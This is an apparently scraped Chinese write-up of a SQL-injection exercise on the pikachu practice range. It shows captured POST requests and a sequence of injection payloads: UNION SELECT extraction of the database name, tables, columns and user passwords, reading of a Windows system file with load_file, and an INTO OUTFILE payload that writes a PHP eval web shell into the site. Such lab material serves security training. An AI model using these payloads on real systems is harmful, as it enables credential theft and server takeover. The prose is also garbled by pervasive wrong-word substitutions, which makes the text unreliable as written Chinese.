pikachu靶场SQL-Inject模块的实验操纵
实验环境
- pikachu靶场
- bp抓包
- FoxyProxy插件
- hackbar插件
实验思绪
- 分析网站以及数据包,找到大概纯在的注入点(可控变量)
- 测试大概纯在的注入点(可控变量)是否可以被直接或间接的修改其值,并根据回显信息判定是否可以或许完备(即网站没有对该变量的值举行过滤大概该过滤可以或许被绕过)的传到数据库中实行
- 举行sql注入,拿到想要的信息
实验步调
实验一:数字型注入(post)
1.分析数据包
起首分析这是一个post哀求,通过欣赏器提交查询,bp抓包分析数据包
- POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
- Host: 192.168.202.130
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
- Accept-Encoding: gzip, deflate, br
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 30
- Origin: http://192.168.202.130
- Connection: close
- Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
- Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
- Upgrade-Insecure-Requests: 1
- Priority: u=0, i
- id=2&submit=%E6%9F%A5%E8%AF%A2
复制代码 可知我们提交查询的数据是通过id变量提交,同时也通过submit变量提交我们的是否提交的状态,因此id大概纯在注入点。
2.判定是否是注入点
我们将数据包放在bp的Repeater模块中,通过修改数据包中id变量的值来判定网站是否对id的值举行过滤以及该值是否会带到数据库中实行
通过修改数据包中id变量的值并发送后的相应信息可知,该值没有被过滤并带到了数据库实行
- #请求数据包
- POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
- Host: 192.168.202.130
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
- Accept-Encoding: gzip, deflate, br
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 31
- Origin: http://192.168.202.130
- Connection: close
- Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
- Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
- Upgrade-Insecure-Requests: 1
- Priority: u=0, i
- id=2'&submit=%E6%9F%A5%E8%AF%A2
复制代码- #回显信息
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
复制代码 阐明id是可控变量,而且网站没有过滤,下一步我们要举行sql注入
3.sql注入
1.判定是数字型还是字符型:通过and 1=1和and 1=2判定,相应包正常回显,阐明是数字型。
- POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
- Host: 192.168.202.130
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
- Accept-Encoding: gzip, deflate, br
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 40
- Origin: http://192.168.202.130
- Connection: close
- Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
- Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
- Upgrade-Insecure-Requests: 1
- Priority: u=0, i
- id=2 and 1=1 &submit=%E6%9F%A5%E8%AF%A2
复制代码 - POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
- Host: 192.168.202.130
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
- Accept-Encoding: gzip, deflate, br
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 39
- Origin: http://192.168.202.130
- Connection: close
- Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
- Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
- Upgrade-Insecure-Requests: 1
- Priority: u=0, i
- id=2 and 1=2 &submit=%E6%9F%A5%E8%AF%A2
复制代码 2.查询全部用户的信息:or 1=1
 - POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
- Host: 192.168.202.130
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
- Accept-Encoding: gzip, deflate, br
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 38
- Origin: http://192.168.202.130
- Connection: close
- Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
- Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
- Upgrade-Insecure-Requests: 1
- Priority: u=0, i
- id=2 or 1=1 &submit=%E6%9F%A5%E8%AF%A2
复制代码 3.order by推测字段:输入order by 2时还能查询到结果,但输入order by 3时就没有结果了,阐明有两个字段。

 - POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
- Host: 192.168.202.130
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
- Accept-Encoding: gzip, deflate, br
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 48
- Origin: http://192.168.202.130
- Connection: close
- Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
- Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
- Upgrade-Insecure-Requests: 1
- Priority: u=0, i
- id=2 order by 2&submit=%E6%9F%A5%E8%AF%A2
复制代码 4.union查询:由于前面有两个字段,以是查询时只能有两个占位表现符
 - POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
- Host: 192.168.202.130
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
- Accept-Encoding: gzip, deflate, br
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 49
- Origin: http://192.168.202.130
- Connection: close
- Referer: http://192.168.202.130/pikachu/vul/sqli/sqli_id.php
- Cookie: PHPSESSID=4eotmsp5t3q8sn3a6ht7ql1g1i
- Upgrade-Insecure-Requests: 1
- Priority: u=0, i
- id=-2 union select 1,2 &submit=%E6%9F%A5%E8%AF%A2
复制代码 5.爆库、用户、版本号、表、列、字段值:
- 利用函数 database(),user(),version() 可以得到所探测数据库的数据库名、用户名和版本号
- id=-1 union select database(),user()
复制代码
- 爆表(group_concat函数让查询的结果在一行表现)
- id=-2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'
复制代码
- id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
复制代码
- id=-1 union select username,password from users
复制代码
6.读取体系文件- id=-1 union select 1,load_file('C:\\Windows\\win.ini')
复制代码
7.写入木马文件- id=1 union select 1,'<?php @eval($_POST["m"]);?>' into outfile 'C:/phpstudy/www/pikachu/vul/sqli/shell.php'
复制代码
|